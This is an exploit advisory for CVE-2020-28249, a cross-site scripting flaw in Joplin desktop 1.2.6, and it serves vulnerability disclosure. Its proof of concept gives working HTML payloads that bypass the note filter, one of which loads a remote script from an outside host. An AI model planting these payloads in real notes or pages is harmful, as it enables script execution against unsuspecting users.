Exploit Title: Joplin 1.2.6 Cross Site Scripting
Date: 2020-10-27
Exploit Author: Philip Holbrook (@fhlipZero)
Vendor Homepage: https://joplinapp.org/
Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
Version: 1.2.6
Tested on: Windows / Mac
CVE : CVE-2020-28249
References:
PENDING next release
-
Technical Details An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter
-
PoC Paste the following payload into a note:
<link rel=import href="data:text/html,<script>alert(1)</script>
<script src="//brutelogic.com.br/1.js#
<script>alert(1)</script>